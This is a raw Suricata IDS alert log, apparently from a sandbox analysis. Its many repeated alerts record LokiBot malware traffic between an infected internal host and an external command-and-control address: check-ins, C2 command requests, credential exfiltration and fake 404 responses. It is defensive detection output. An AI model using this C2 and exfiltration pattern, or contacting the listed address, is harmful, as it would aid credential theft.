                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49706 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49735 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49735 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49704 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49705 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49717 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49705 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49705 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49786 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49774 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49774 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49717 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49717 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49704 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49709 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49709 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49792 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49708 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49792 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49708 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49792 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49774 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49735 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49853 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49774 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49774 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49706 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49763 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49705 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49875 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49893 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49893 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49717
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49893 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49704 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49709
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49893 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49780 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49780 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49780 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49735 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49763 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49763 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49792 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49763 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49875 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49875 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49757 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49893 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49786 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49853 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49786 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49706 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49792 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49708
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49763 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49780 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49780 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49757 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49899 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49757 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49757 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49710 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49792
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49875 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49875 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49899 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49899 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49853 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49710 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49710 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49735 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49735
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49786 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49859 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49763
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49780
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49706
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49757
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49893
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49853 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49899 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49853 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49899 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49710 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49710 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49774
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49881 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49881 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49798 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49798 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49875
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49845 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49899
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49972 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49786 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49972 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49853
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49972 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49845 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49925 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49859 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49859 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49707 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49972 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49707 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49707 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49972 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49786
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49798 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49859 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49859 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49963 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49798 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49963 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49710
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49963 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49881 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49707 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49707 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49972
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49798 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49832 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49826 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49826 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49995 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49745 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49968 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49845 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49963 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49963 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49707
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49826 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49995 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49859
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49845 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49845 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49941 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50002 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49832 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50002 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50002 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49826 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50010 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49968 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49968 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49995 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49941 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49941 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49968 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49826 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49968 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49798
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49832 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50019 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49820 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49820 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50023 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49820 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50010 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49941 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49832 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49941 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49832 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49941
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50046 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50046 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50046 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49980 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50013 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50019 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50013 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50046 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50035 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50035 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49968
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50039 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50039 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49983 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49983 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49745 -> 188.114.96.3:80
